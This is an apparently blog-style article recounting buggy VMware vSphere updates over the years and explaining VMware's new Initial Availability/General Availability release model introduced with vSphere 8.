Avoid Bugs with latest VMware vSphere 8 Update

This autumn at Explore 2022 VMware has made some fresh announcements, and the biggest one is the release of new vSphere 8 and vSAN 8 platforms. Both European and American conferences had a lot of talks about future VMware products and technologies, however, the shift to new vSphere release schedule has gone largely unnoticed, and this is what we’re going to talk about today.

Admins with virtual infrastructure experience remember that many years ago installed the first major updates of the primary vSphere components (ESXi and vCenter) right after their releases used to be a risky venture. The reason is simple. More often than not, releases of a major version or a large package of updates (Update 1/2/3) were accompanied by numerous bugs that either did not affect the functioning of the platform or could seriously damage the workflow and even eradicate critical data (and this requires time for recovery at the very least).

One of the first such cases is a timebomb emerging because of the licensing bug VMware Virtual Infrastructure 3.5 (now it is called vSphere). As a result, users’ licenses were deemed to be invalid which disabled the possibility to run VMs and move them using VMware VMotion (now it’s vMotion). It happened in August 2008, and it did scare a LOT of people. VMware had to release critical patches immediately (along with the apology from the CEO):

The interesting thing is that the users were offered to turn off NTP and to turn the clock on the ESX host back. A workaround like that came as a surprise to a lot of admins back then.

More interesting issues and problems came later. For example, an issue with unexpected reboots when using Virtual Machine Failure Monitoring (today it’s a part of VMware HA) on VMware ESX 3.5 Update 3 (back then, it used to be the Linux-based ESX hypervisor instead of ESXi).

You may think that over the course of time the number of problems in the major updates came to be reduced. Well, you’re right about that, but only partially. Many of you may remember that after the VMware vSphere 5 Update 1 VM Auto Start breaks stopped working for a while for some reason.

Basically, no wonder that it happened. VMware have been developing its own hypervisor since the end of the 90s, and since a lot of new things appeared, including HA, DRS, vMotion, hardware virtualization, etc. Such a complex product is extremely challenging to maintain and control in each aspect.

The most recent catastrophe with the VMware vSphere 7 Update 3 is the perfect example. Although it has happened last year, it took them more than a couple of months to come up with a solution. It was fixed only at the beginning of this year. The chronology of the events is as follows:

At the end of September 2021 VMware releases vSphere 7 Update 3 with a whole range of new features. The users are more than happy, however…
… in November 2021 cause of the critical issues VMware pulls Update 3 back, removes it from the website, and disables downloading option.

This update had a lot of problems, and some of them were more than troublesome. These are PSODs, complications when upgrading from the previous versions, vSphere HA stability issues, etc:

In December 2021 users rightly stated that the problem exists more than a month at that moment, and a lot of people have already upgraded their environments to Update 3 before it was pulled back. The primary documentation about this case and the latest update was released on VMware website.
Finally, it wasn’t until January 2022 that VMware released final patch introduced in the release of VMware vSphere 7 Update 3c. Even though the problem was eventually resolved, a lot of users had a good scare, especially those that have already upgraded their VMware vSphere and couldn’t afford to pull back to the previous version.

The given examples only show why the clients used to so skeptical regarding VMware vSphere updates. The main rule was that after any major release one should just wait for the next one and practically upgrade to the previous one. Nothing is surprising about such caution since the slightest bug can cause serious damage to a large infrastructure, becoming quite a headache for admins.

Admittedly, it had been slowing down a lot the implementation of new solutions, which is why this year VMware opted to change their approach entirely. As of now, we have the IA/GA (Initial Availability/General Availability) model, which enables to straighten the release scheme of the Cloud Services products within the framework of the vSphere+ subscription. However, it is primary purpose is to give the users time to detect any serious issues that may or may not appear at the Initial Availability stage.

IA release is, just as it was before, a fully Enterprise-ready product that follows every enterprise standard of VMware at the GA release level and is fully tested. However, it becomes available 4-6 weeks before the official GA release so that the feedback can be gathered from VMware partners and clients (and, of course, so that the critical issues can be detected in time). All major reported problems are going to be made public in the VMware blogs.

Now, the users have just enough time to find out whether anything dangerous has happened within these 1-2 months and whether it is safe to upgrade the host servers. Such a scheme is supposed to be more efficient than the previous approach which was basically waiting for another update (vSphere Update X is usually released after about half a year).

That being said, this is what common scheme of IA/GA releases for VMware vSphere looks something like this:

VMware, as usual, offers one of the 3 options to deploy the hypervisor:

Base image
Base image with vendor add-on
Vendor image received through the OEM channel

The most interesting thing here is that by doing it VMware essentially admitted that any release can have problems, and that it is not wise to hurry with the upgrade. Well, what are you gonna do? You can’t make an omelette without breaking eggs.

Yet another aspect worth mentioning is security. In the last couple of years, the Day-O vulnerabilities issue became the primary problem. We have already seen just how serious were the vulnerabilities in Intel products (Spectre, for example) and in various VMware services. It would be also smart to remember the issues with VMware Carbon Black , vCenter services, and VMDK disks’ ransomware encryption.

If we were to turn the Meltdown and Spectre vulnerabilities, it is evident that VMware have made the same mistake as before: at first, the patch was released but it was eventually pulled back. These vulnerabilities aren’t going unnoticed by the host hardware vendors as well:

And, of course, how could we forget about the notorious Log4j vulnerability, which appeared in the component of Apache Software Foundation log4j Java logging, which means it appeared in a lot of VMware products. This vulnerability is described as allowing an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. This one right here is a “zero-day” type vulnerability, which means by the time they had started fixing the problem, it could have been easily used within thousands of virtual environments all over the world.

That is exactly why VMware has decided to switch to Initial Availability/General Availability. Strictly speaking, from now all users have two options to go: early adopters get the product beforehand but with the risk of catching bugs, while large environments upgrade after a couple of months if everything is ok (not six months as it used to be). Well, at least that’s what they offer anyway.

This time the General Availability release was announced when the number of VMware vSphere downloads has reached 18000, and it has been waiting to be released for almost two months:

By the way, General Availability has the same image as Initial Availability. That means that nothing serious has happened this time which is why the IA/GA configuration more likely than not will be used in the future.

Learn From Your Mistakes: VMware vSphere IA/GA